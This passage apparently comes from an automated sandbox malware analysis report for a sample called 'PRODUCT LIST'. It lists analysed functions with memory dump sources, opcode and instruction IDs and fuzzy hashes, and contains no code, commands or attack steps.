                                                                                        • Opcode Fuzzy Hash: 20ba09f11a20bf24ae625e5eafeeedd19d4ebe0318d92bf92ae274a53977ea7c
                                                                                        • Instruction Fuzzy Hash: DD217E70A00209DFEB08EF68E855B9EBBB2FB84301F108669D105A7395DF396E41CF90
                                                                                        Function 064D8E6F Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: wnl^
                                                                                        • API String ID: 0-3497982283
                                                                                        • Opcode ID: 849bb98e35288c8cb1b6e412ab17e5497dce78f972da541406a338c6f7a02cb5
                                                                                        • Instruction ID: fa39e5bdeab773fff3f0812014f22870a0ccc4fc594ab44db219c53bda406f48
                                                                                        • Opcode Fuzzy Hash: 849bb98e35288c8cb1b6e412ab17e5497dce78f972da541406a338c6f7a02cb5
                                                                                        • Instruction Fuzzy Hash: E3218CB1C092948FDB11CF99D4946DEBFF0EF49314F08849EC498AB212D3789549CFA5
                                                                                        Function 06522F45 Relevance: 1.3, Instructions: 1284COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205726688.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6520000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7997f74f6d81bf77481aae646596a1f708def5f30cbcbf9aa90159fae0f54fbe
                                                                                        • Instruction ID: ee9eef356b26fe8afd34f5fd6474d98295166db1f0edc5e7f5e0cd2003106430
                                                                                        • Opcode Fuzzy Hash: 7997f74f6d81bf77481aae646596a1f708def5f30cbcbf9aa90159fae0f54fbe
                                                                                        • Instruction Fuzzy Hash: 2BA1BE74B002159FCF449B68CC54A6EBBF2FF89700B14846AE516DB3A2DB78DC45CBA0
                                                                                        Function 064DB8F1 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ${q
                                                                                        • API String ID: 0-4291956445
                                                                                        • Opcode ID: 92a456cb2a09ee405e1b3396155236544e31c58b8b205895130619d87f6792cb
                                                                                        • Instruction ID: 1924dfd6d75a27f693af06a3ef1a91a5c31a25139c0f1c5161f16b3c18871190
                                                                                        • Opcode Fuzzy Hash: 92a456cb2a09ee405e1b3396155236544e31c58b8b205895130619d87f6792cb
                                                                                        • Instruction Fuzzy Hash: 47F02070E09390DFEBB28A34945472A7BE5EB85224F04009BD98283742DBAABC00C392
                                                                                        Function 06520048 Relevance: .7, Instructions: 664COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205726688.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6520000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 310082b29ba02d7dcf25dc0cdd7a5d2af089408ae9e6c7f6ff4ece417853de08
                                                                                        • Instruction ID: f40258f8e1f01b43ead4e67b1674a76b3ce029be918dc344029e137ef1f16e18
                                                                                        • Opcode Fuzzy Hash: 310082b29ba02d7dcf25dc0cdd7a5d2af089408ae9e6c7f6ff4ece417853de08
                                                                                        • Instruction Fuzzy Hash: E54259B07006258FCB24AF68D85066EBBB6FFC6705B404D1CD502AB391CB79ED468B96
                                                                                        Function 064D0040 Relevance: .4, Instructions: 447COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a699cc8eb7af1376aa804423b0de5c4705492b69d4d859b21d0d361b379d4ba4
                                                                                        • Instruction ID: 1b8bb93ce5646bdf3390d18f8532b8d96df515acb76845a6f11c41ab78027e5b
                                                                                        • Opcode Fuzzy Hash: a699cc8eb7af1376aa804423b0de5c4705492b69d4d859b21d0d361b379d4ba4
                                                                                        • Instruction Fuzzy Hash: C312F575A00214CFCB54DFA9D594A9DBBF2EF88711F2580AAE805EB361CB31ED46CB50
                                                                                        Function 064D9010 Relevance: .4, Instructions: 371COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 464a0ce87a030521824f8936ddf33ba8cb544481a08ff33c5c77ae4e6f91d884
                                                                                        • Instruction ID: b8878ae50a12e38f1d2bf81c6e188c15ac5852f27db9e99df3da1c7948578b18
                                                                                        • Opcode Fuzzy Hash: 464a0ce87a030521824f8936ddf33ba8cb544481a08ff33c5c77ae4e6f91d884
                                                                                        • Instruction Fuzzy Hash: 8FF13A71E00609CFDB55DF69C950A9ABBB5FF88300F15C69AD808AB311EB70E985CF81
                                                                                        Function 064D2E58 Relevance: .4, Instructions: 365COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5d1e69c65e3899977d5053826b404d19ca8e6025ee81f7e82508690a9332b12c
                                                                                        • Instruction ID: 0bc62ed6446fad6b75f2c8ec08104496009a0986239ccf9dd70efcc181015054
                                                                                        • Opcode Fuzzy Hash: 5d1e69c65e3899977d5053826b404d19ca8e6025ee81f7e82508690a9332b12c
                                                                                        • Instruction Fuzzy Hash: 22C10130B042449FCB16DB39DC5596EBFB6EF86210B1484AAE405DB351DF35DE02CBA2
                                                                                        Function 06520000 Relevance: .3, Instructions: 349COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205726688.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6520000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 72354a4b5bc2a469806f7ed8a03d22e6f989def90721bb0da6c8c233aa048707
                                                                                        • Instruction ID: 9916e3489a49af4a9092e6c2d69a6885c64b2a3583add4897714a4d228cfefdb
                                                                                        • Opcode Fuzzy Hash: 72354a4b5bc2a469806f7ed8a03d22e6f989def90721bb0da6c8c233aa048707
                                                                                        • Instruction Fuzzy Hash: 02D1AD70B012159FEF019F64C844A6ABBB6FF8A700F158496E501DB3E2CBB5DD46CBA1
                                                                                        Function 064D06A8 Relevance: .2, Instructions: 247COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 41408435bd0f11cf84bbc133456ddd522f7f8d518066294e8e31b344d85b4922
                                                                                        • Instruction ID: 692fc80f2f3e81177e6e2dae4bcb23704a90b1f9c7900e4ee8ec76193947ab46
                                                                                        • Opcode Fuzzy Hash: 41408435bd0f11cf84bbc133456ddd522f7f8d518066294e8e31b344d85b4922
                                                                                        • Instruction Fuzzy Hash: 83917C74B002109FDB55DF68D458A6EBBF6EF89740F18846AE905DB3A1DB34DC41CBA0
                                                                                        Function 064DB960 Relevance: .2, Instructions: 178COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7dffdbeab225b10d413ba206212288bc2be5d3523976143246dcbd36bcb777c8
                                                                                        • Instruction ID: f7bc6bb05475c3e67d47b5782e1953831bf09e0983a35819d9997c2a275ffe04
                                                                                        • Opcode Fuzzy Hash: 7dffdbeab225b10d413ba206212288bc2be5d3523976143246dcbd36bcb777c8
                                                                                        • Instruction Fuzzy Hash: 4F51E2B1F002148FDF59AAB8986057F76A6EBC8340F25447AD406EB384EE39CD42C7E1
                                                                                        Function 064D1951 Relevance: .2, Instructions: 173COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e42c7474b23600e33030b7a15030179c179403de7ea9e27f908dcc576694289f
                                                                                        • Instruction ID: 862f72ce2bcd5a62f036e38b50960ddf62333b420ac660519c869b6ed5f0271d
                                                                                        • Opcode Fuzzy Hash: e42c7474b23600e33030b7a15030179c179403de7ea9e27f908dcc576694289f
                                                                                        • Instruction Fuzzy Hash: F9613C746001044FDB45EB68E892ABEB7F7EFC43007548928D016AB361DE35EE869BA1
                                                                                        Function 064D1960 Relevance: .2, Instructions: 173COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c12fa20866c267bccf6293c853688a4ad9c7a0ea98f0f206701262005e018f7f
                                                                                        • Instruction ID: 8ad6f5eb54bb03be875462faee3795e814186b8b7d9d98076b526f908789a94b
                                                                                        • Opcode Fuzzy Hash: c12fa20866c267bccf6293c853688a4ad9c7a0ea98f0f206701262005e018f7f
                                                                                        • Instruction Fuzzy Hash: 69513B746001044FDB45FF68E8929BEB6F7EFC43007548928D416AB361EF35EE868BA5
                                                                                        Function 06522D00 Relevance: .1, Instructions: 143COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205726688.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6520000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 789287b53301e1b0742a5ff7886cbdda2111090f4920f65f7fbcb78bf31387a5
                                                                                        • Instruction ID: 0beca39d5cafb0a9d465d94c045ab5bb2d482e2c6f34c04a580f3d4a93b69db6
                                                                                        • Opcode Fuzzy Hash: 789287b53301e1b0742a5ff7886cbdda2111090f4920f65f7fbcb78bf31387a5
                                                                                        • Instruction Fuzzy Hash: 75515835B102199FCB48CF69C884AAEBBB2FF89710F118069E905EB361DB31ED05CB50
                                                                                        Function 064DABA8 Relevance: .1, Instructions: 134COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b9171530bca7f5d1178daf27aa0cdfcf1e1d99e7803e2ccc587bc909a3e3c34f
                                                                                        • Instruction ID: 7dc6823a34d96f95a6b0ba24edfc380207985749a9d8d66c52a186ccee4bae1c
                                                                                        • Opcode Fuzzy Hash: b9171530bca7f5d1178daf27aa0cdfcf1e1d99e7803e2ccc587bc909a3e3c34f
                                                                                        • Instruction Fuzzy Hash: C341D371B002145FDB15AF68C850BAEBBA6EFC4750F14806AD905EB385DB35AE82C7E1
                                                                                        Function 064D8558 Relevance: .1, Instructions: 127COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 806ebbcdc3f5c9e15d15c28399b0dfb1c2e68ba31988139f072e2667fb673a55
                                                                                        • Instruction ID: 78ed33eaa961d2964a6134c22789ecad8e3d48a37bccdc79aca7d65974080040
                                                                                        • Opcode Fuzzy Hash: 806ebbcdc3f5c9e15d15c28399b0dfb1c2e68ba31988139f072e2667fb673a55
                                                                                        • Instruction Fuzzy Hash: E9415E706002048FCB59EF34D85556EBBA3EF81305B108E6DE1079B365EF79AE868BD0
                                                                                        Function 064D8548 Relevance: .1, Instructions: 117COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9ebf66139ca173f6bfc22fbf8e4109c40769ead9b0fc98994bb91a5e601b51a4
                                                                                        • Instruction ID: 19f1aee5689a72a571af117dc308b82284cd3ae46248b6e8c7132033138b2a68
                                                                                        • Opcode Fuzzy Hash: 9ebf66139ca173f6bfc22fbf8e4109c40769ead9b0fc98994bb91a5e601b51a4
                                                                                        • Instruction Fuzzy Hash: 48416B706002049FCB55EF34D85556FBBA3EF81304B008E69E1079B365EF75AE8A8BD0
                                                                                        Function 064D1D38 Relevance: .1, Instructions: 107COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fc4b0bec852be03727b31a315c0ba7013c0bd23fa1710b548f43d464fef1e9f0
                                                                                        • Instruction ID: 5b0c3c0a7b80fdc96f177922986d146e7e84c076ebdfcdc866eaa28ef96c4163
                                                                                        • Opcode Fuzzy Hash: fc4b0bec852be03727b31a315c0ba7013c0bd23fa1710b548f43d464fef1e9f0
                                                                                        • Instruction Fuzzy Hash: E4416D70B007028FDB65CF35D890967B7E9FF402547108D6AEC5A8BA65EB38F845CB90
                                                                                        Function 064D8988 Relevance: .1, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: df5ffcaf5b6302bcf3792ceb856930b07076a807bc6a56532ed398dde494b098
                                                                                        • Instruction ID: f4cf821b1051bf01e047600ae536be5c79d5ad8aa6c10f03b217f7eaa36b5a52
                                                                                        • Opcode Fuzzy Hash: df5ffcaf5b6302bcf3792ceb856930b07076a807bc6a56532ed398dde494b098
                                                                                        • Instruction Fuzzy Hash: CC31A1706043009FD718DF25E891A6AB7A7FFC8311F144A29E14A4B7A4DB75B8C5CB91
                                                                                        Function 064DF99E Relevance: .1, Instructions: 94COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b673e49019fde3651f98b44ef48197882f3d7c9fd5f39382b6626eb89a06c977
                                                                                        • Instruction ID: 4aaedf62378594ea564f606730b84ad72648fe4747e4e8b2a73a288ff3b4748e
                                                                                        • Opcode Fuzzy Hash: b673e49019fde3651f98b44ef48197882f3d7c9fd5f39382b6626eb89a06c977
                                                                                        • Instruction Fuzzy Hash: 7141E3B1D00249DFDB60CF99C490A9EBFB5AF48310F14802AE80AAB314DB749949CB90
                                                                                        Function 064DF9A8 Relevance: .1, Instructions: 90COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 911655e336be7a53b9ff04dbb8668dc0298f436aa6144fc870e7034cf27df8bf
                                                                                        • Instruction ID: 285a2b9e20b442922627ec8d527a6c81e83342b0ba5143ec88e3a2c508038c6d
                                                                                        • Opcode Fuzzy Hash: 911655e336be7a53b9ff04dbb8668dc0298f436aa6144fc870e7034cf27df8bf
                                                                                        • Instruction Fuzzy Hash: FA41E2B1D002499FDB50CF99C490ADEBFF5EF48310F14802AE81AAB354DB75A949CB90
                                                                                        Function 064D74A0 Relevance: .1, Instructions: 81COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b31bb15fd9412123a56e9022b74a162dea93f7b878e6b05c59050321d78e9cb7
                                                                                        • Instruction ID: 4055bc2a2d6f1a9cad7964b83988d301fd1a1563b166e9abdf2d5b15005461c4
                                                                                        • Opcode Fuzzy Hash: b31bb15fd9412123a56e9022b74a162dea93f7b878e6b05c59050321d78e9cb7
                                                                                        • Instruction Fuzzy Hash: B33158B0D003498FDF95DFA9D964BEFBBB1EB48304F00442EC915A6781CB799944CB96
                                                                                        Function 064D6070 Relevance: .1, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7be9665fcc03a32161106eef5571e88f88afb3fcf344041d305282c545002abd
                                                                                        • Instruction ID: a9ec8b659583ffa7f5cb92cccd92afd44741f549cb40f2deca92626d387ad9f1
                                                                                        • Opcode Fuzzy Hash: 7be9665fcc03a32161106eef5571e88f88afb3fcf344041d305282c545002abd
                                                                                        • Instruction Fuzzy Hash: 64219031E003599BDF15DFA8D8506DEBBB6FF89310F10422AE905AB254DB71BD45CB80
                                                                                        Function 00F9D054 Relevance: .1, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2198841224.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_f9d000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fd60b4572bf768dfe03f96c14e65a5515002cb635e1f0cc1da59e6dfb0f7592d
                                                                                        • Instruction ID: bbcfd525fbe2b00a5820ba9cee88f134443d4a96fa81ab9b55ab4cc0949b2d60
                                                                                        • Opcode Fuzzy Hash: fd60b4572bf768dfe03f96c14e65a5515002cb635e1f0cc1da59e6dfb0f7592d
                                                                                        • Instruction Fuzzy Hash: 7A214872904200DFEF15DF14D9C0B16BF65FB88324F34C669E9480B255C336D856DBA2
                                                                                        Function 064D614F Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 696fceaf8c690ad7fef4985cc3198815d5049cda7ba48b72bd6cbd2c3a01020f
                                                                                        • Instruction ID: d5bb17e6211af1a505c76f9bc0ad8dd550e12e0afcaab6dc3f2d9daf1215764c
                                                                                        • Opcode Fuzzy Hash: 696fceaf8c690ad7fef4985cc3198815d5049cda7ba48b72bd6cbd2c3a01020f
                                                                                        • Instruction Fuzzy Hash: 98314370A00349DFCF01DFA8E85468EBB79FF45314F108665E4056B215DB74AD85CF90
                                                                                        Function 064DEDAA Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7fb0bd504afae182ff8894fd53c57a5584122fd21abddc6ab1f7862c70d13b7c
                                                                                        • Instruction ID: 34a81ad483d5ff755466c0f43f6eb776b7c92b5414ae1a9b0fd2dd3a8b9e289d
                                                                                        • Opcode Fuzzy Hash: 7fb0bd504afae182ff8894fd53c57a5584122fd21abddc6ab1f7862c70d13b7c
                                                                                        • Instruction Fuzzy Hash: 3B210871D143469FDF19CF60D854A9FBB71BF85300F11459AE801AF241DBB0E986CB91
                                                                                        Function 064D96C1 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6007e9b4cdd0bff8d41d9718b7ce1e85120dd822c0240261529ed255b22ebc4c
                                                                                        • Instruction ID: 1140406b7c7abcc1d7ff0486851a5b21dbd6e07ee682e8c7ba2a6c12b6b04a5a
                                                                                        • Opcode Fuzzy Hash: 6007e9b4cdd0bff8d41d9718b7ce1e85120dd822c0240261529ed255b22ebc4c
                                                                                        • Instruction Fuzzy Hash: 06110430F002245BDFA6262A4C210BFBAEA9FC9644F1004BFD906D7345DE74CD0683A2
                                                                                        Function 00FAD2F4 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2198887225.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fad000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6783af6fe6c73e4b6d46c908c3db3ce07024a6c2b7a98ef47f24d359ba404c8a
                                                                                        • Instruction ID: 9e99e27a5558bfdb25f0992e8be004364ad2632dfe72a06123b7227cec573f19
                                                                                        • Opcode Fuzzy Hash: 6783af6fe6c73e4b6d46c908c3db3ce07024a6c2b7a98ef47f24d359ba404c8a
                                                                                        • Instruction Fuzzy Hash: DB2138F6604300DFDF00DF14D5C0B1ABB65FB85324F24C569D84A4B645C33AD846DAA3
                                                                                        Function 00FAD4A4 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2198887225.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fad000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: efe7c6a6f76ca9acd96bf186d7918bbfadd2c2e7f7152a2540aebe4ff209b0bf
                                                                                        • Instruction ID: 56acd20457642725fde4f506d9a90d1ab00637eaf9635a77aba1ac8a30794de0
                                                                                        • Opcode Fuzzy Hash: efe7c6a6f76ca9acd96bf186d7918bbfadd2c2e7f7152a2540aebe4ff209b0bf
                                                                                        • Instruction Fuzzy Hash: 622149F5D04204DFCB00CF14D5C0B16BB65FB89328F28C96DDC4A4BA51C736D846DA62
                                                                                        Function 064D0A00 Relevance: .1, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 90d81e8a4939321a4ee005697de8a3da469414369ef8d1f561921316d2e215bf
                                                                                        • Instruction ID: aecde56343c9ae0abd7ac8a4cdbfaa98ff4abb068c1fa059937f31cdad945977
                                                                                        • Opcode Fuzzy Hash: 90d81e8a4939321a4ee005697de8a3da469414369ef8d1f561921316d2e215bf
                                                                                        • Instruction Fuzzy Hash: 4E212C757041149FC784DF6AE898D6EBBEAFF89611B55816AF409CB361CB34EC01CB60
                                                                                        Function 064D9000 Relevance: .1, Instructions: 58COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1558fe0bb7177e9da7944e3ec27c0bba8af43663886c3b420176cb08900d9337
